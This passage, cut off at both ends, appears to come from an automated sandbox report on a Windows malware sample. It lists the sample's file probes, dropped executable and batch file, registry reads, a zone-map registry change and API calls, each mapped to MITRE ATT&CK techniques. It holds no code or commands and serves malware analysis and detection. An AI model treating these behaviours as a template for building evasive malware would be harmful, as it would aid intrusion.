file \"C:\\IPHLPAPI.DLL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\HGDraw.dll\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\api-ms-win-downlevel-advapi32-l2-1-0.dll\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"biudfw.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"c:\\windows\\fonts\\staticcache.dat\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"c:\\ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"c:\\users\\%osuser%\\searches\\desktop.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"c:\\users\\%osuser%\\videos\\desktop.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"c:\\users\\%osuser%\\pictures\\desktop.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"c:\\users\\%osuser%\\contacts\\desktop.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"c:\\users\\%osuser%\\favorites\\desktop.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"c:\\users\\%osuser%\\music\\desktop.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" reads file \"c:\\users\\%osuser%\\downloads\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"C:\\IPHLPAPI.DLL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"C:\\Windows\\system32\\IPHLPAPI.DLL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"C:\\WINNSI.DLL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"C:\\Windows\\system32\\WINNSI.DLL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"C:\\dwmapi.dll\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"C:\\Windows\\system32\\dwmapi.dll\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\HGDraw.dll\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfinfo.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfinfo.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfset.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe.Local\\\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\biudfw.exe:Zone.Identifier\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\sanfdr.bat:Zone.Identifier\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\GOLFINFO.INI\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\GOLFSET.INI\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\ED09BE6F5EBB23CA1A209E1587584A094399558FF2FD5CA33465CFD226B3B49D.EXE.LOCAL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\biudfw.exe:ZONE.IDENTIFIER\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\sanfdr.bat:ZONE.IDENTIFIER\"\n \"biudfw.exe\" trying to access non-existent file \"\\DEVICE\\NETBT_TCPIP_{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"\n \"biudfw.exe\" trying to access non-existent file \"\\Device\\RasAcd\"\n \"biudfw.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\biudfw.exe.Local\\\"\n \"biudfw.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\BIUDFW.EXE.LOCAL\"\n \"cmd.exe\" trying to access non-existent file \"C:\\ED09BE6F5EBB23CA1A209E1587584A094399558FF2FD5CA33465CFD226B3B49D.EXEIF\"\n \"cmd.exe\" trying to access non-existent file \"C:\\EXIST\"\n \"cmd.exe\" trying to access non-existent file \"C:\\GOTO\"\n \"cmd.exe\" trying to access non-existent file \"C:\\REPEAT\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\RPC\"; Key: \"\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\"; Key: \"\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\golfinfo.ini\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\biudfw.exe\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\sanfdr.bat\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" writes file \"%temp%\\biudfw.exe\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" writes file \"%temp%\\sanfdr.bat\"\n \"biudfw.exe\" writes file \"%temp%\\golfinfo.ini\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" connecting to \"\\ThemeApiPort\"\n \"biudfw.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"biudfw.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows PECompact2 compressed\"- Location: [%TEMP%\\biudfw.exe]- [targetUID: 00000000-00005876]\n \"sanfdr.bat\" has type \"ASCII text with CRLF CR line terminators\"- Location: [%TEMP%\\sanfdr.bat]- [targetUID: 00000000-00005876]\n \"golfinfo.ini\" has type \"Non-ISO extended-ASCII text with very long lines (512) with no line terminators\"- Location: [%TEMP%\\golfinfo.ini]- [targetUID: 00000000-00006040]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"biudfw.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"biudfw.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"SOURCEPATH\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"DEVICEPATH\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"ED09BE6F5EBB23CA1A209E1587584A094399558FF2FD5CA33465CFD226B3B49D\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadResource with parameter {'hModule': '655360', 'hResInfo': '803416'}\" (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadResource with parameter {'hModule': '655360', 'hResInfo': '803008'}\" (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadResource with parameter {'hModule': '655360', 'hResInfo': '803456'}\" (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadResource with parameter {'hModule': '655360', 'hResInfo': '803088'}\" (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadResource with parameter {'hModule': '655360', 'hResInfo': '803152'}\" (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadResource with parameter {'hModule': '655360', 'hResInfo': '803344'}\" (UID: 00000000-00005876)\n \"biudfw.exe\" called \"LoadResource with parameter {'hModule': '917504', 'hResInfo': '1065560'}\" (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadResource with parameter {'hModule': '917504', 'hResInfo': '1065152'}\" (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadResource with parameter {'hModule': '917504', 'hResInfo': '1065600'}\" (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadResource with parameter {'hModule': '917504', 'hResInfo': '1065232'}\" (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadResource with parameter {'hModule': '917504', 'hResInfo': '1065296'}\" (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadResource with parameter {'hModule': '917504', 'hResInfo': '1065488'}\" (UID: 00000000-00006040)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb967670154a0000b0fd7f9a5caa7700f0fd7f88bc290044b0fd7f00000000400000003f0000001b00000000b0fd7f7cbc2900c15caa776082b1771b00000000b0fd7f9a5caa7700f0fd7fa0bc29005789a9778083b1771317a275d8eb9676 (UID: 